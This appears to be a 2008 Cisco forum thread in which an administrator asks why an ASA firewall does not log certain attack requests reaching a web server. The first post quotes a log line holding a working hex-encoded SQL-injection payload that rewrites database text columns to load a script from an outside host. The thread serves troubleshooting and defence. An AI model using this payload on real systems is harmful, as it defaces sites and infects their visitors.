07-23-2008 11:03 AM - edited 03-11-2019 06:19 AM
I have a bunch of attack requests not being logged by my asa-5550 version 7.2(4)
On my web-server I see an attack:
B.A.D.IP; HTTP/1.0 - [23/Jul/2008:11:37:30 -0700] GET /downloads/file/fid?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.0 500 4635; null; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
The only thing I see in the ASA log's is:
Jul 23 11:37:29 192.168.22.254 %ASA-7-609001: Built local-host outside:B.A.D.IP
Jul 23 11:37:29 192.168.22.254 %ASA-6-302013: Built inbound TCP connection 1803718934 for outside:B.A.D.IP/2668 (B.A.D.IP/2668) to inside:192.168.10.100/80 (G.OO.D.IP/80)
Jul 23 11:37:29 192.168.22.254 %ASA-6-302013: Built inbound TCP connection 1803718936 for outside:B.A.D.IP/2669 (B.A.D.IP/2669) to inside:192.168.10.100/80 (G.OO.D.IP/80)
Jul 23 11:37:30 192.168.22.254 %ASA-6-302014: Teardown TCP connection 1803718936 for outside:B.A.D.IP/2669 to inside:192.168.10.100/80 duration 0:00:01 bytes 4123 TCP FINs
Jul 23 11:37:30 192.168.22.254 %ASA-6-302014: Teardown TCP connection 1803718934 for outside:B.A.D.IP/2668 to inside:192.168.10.100/80 duration 0:00:01 bytes 4122 TCP FINs
Jul 23 11:37:30 192.168.22.254 %ASA-7-609002: Teardown local-host outside:B.A.D.IP duration 0:00:01
Usually I'll get the ASA logs (%ASA-5-304001) that I can grep for and see all of the 'Accessed URL' lines. For some reason none of these attacks are being logged. I'm concerned that not only are they getting through, they are doing so silently.
07-29-2008 06:08 AM
Refer to the following urls for more info on the log messages you have got:
http://www.cisco.com/en/US/docs/security/asa/asa80/system/message/logmsgs.html#wp4770603
http://www.cisco.com/en/US/docs/security/asa/asa80/system/message/logmsgs.html#wp4774514
07-29-2008 06:20 AM
Thank you for the response.
I am well aware of the logging types, the problem is that I'm not receiving the logging message 304001 for the given URI. I receive them for all other URI, just not this specific attack.
My thought is that the ASA signature swallows it, does not send it to syslog, and then passes it on to the web server. I'm okay with it passing it along but it seems a little odd that it does not get logged.
I was getting many of these requests and see them on all of my webservers but not one shows up in my syslog while all the other 304001 do show up.
Discover and save your favorite ideas. Come back to expert answers, step-by-step guides, recent topics, and more.
New here? Get started with these tips. How to use Community New member guide